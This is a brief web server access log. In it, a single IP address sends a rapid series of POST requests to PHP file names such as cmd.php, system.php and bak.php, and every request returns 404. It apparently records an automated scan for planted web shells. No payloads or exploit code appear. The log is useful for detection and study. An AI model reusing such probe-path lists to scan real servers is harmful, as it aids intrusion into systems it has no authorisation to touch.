120.27.202.154 - - [01/Nov/2018:08:35:01 +0100] "POST /zuo.php HTTP/1.1" 404 312 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.91 Safari/537.36"
120.27.202.154 - - [01/Nov/2018:08:35:01 +0100] "POST /aotu.php HTTP/1.1" 404 313 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.91 Safari/537.36"
120.27.202.154 - - [01/Nov/2018:08:35:02 +0100] "POST /cmd.php HTTP/1.1" 404 312 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.91 Safari/537.36"
120.27.202.154 - - [01/Nov/2018:08:35:02 +0100] "POST /bak.php HTTP/1.1" 404 312 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.91 Safari/537.36"
120.27.202.154 - - [01/Nov/2018:08:35:02 +0100] "POST /system.php HTTP/1.1" 404 315 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.91 Safari/537.36"
120.27.202.154 - - [01/Nov/2018:08:35:03 +0100] "POST /l6.php HTTP/1.1" 404 311 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.91 Safari/537.36"
120.27.202.154 - - [01/Nov/2018:08:35:03 +0100] "POST /l7.php HTTP/1.1" 404 311 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.91 Safari/537.36"
120.27.202.154 - - [01/Nov/2018:08:35:03 +0100] "POST /l8.php HTTP/1.1" 404 311 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.91 Safari/537.36"
120.27.202.154 - - [01/Nov/2018:08:35:04 +0100] "POST /q.php HTTP/1.1" 404 310 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.91 Safari/537.36"
120.27.202.154 - - [01/Nov/2018:08:35:04 +0100] "POST /56.php HTTP/1.1" 404 311 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.91 Safari/537.36"
120.27.202.154 - - [01/Nov/2018:08:35:04 +0100] "POST /mz.php HTTP/1.1" 404 311 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.91 Safari/537.36"
120.27.202.154 - - [01/Nov/2018:08:35:04 +0100] "POST /xx.php HTTP/1.1" 404 311 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.91 Safari/537.36"
120.27.202.154 - - [01/Nov/2018:08:35:04 +0100] "POST /yumo.php HTTP/1.1" 404 313 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.91 Safari/537.36"
120.27.202.154 - - [01/Nov/2018:08:35:05 +0100] "POST /min.php HTTP/1.1" 404 312 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.91 Safari/537.36"
120.27.202.154 - - [01/Nov/2018:08:35:05 +0100] "POST /wan.php HTTP/1.1" 404 312 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.91 Safari/537.36"
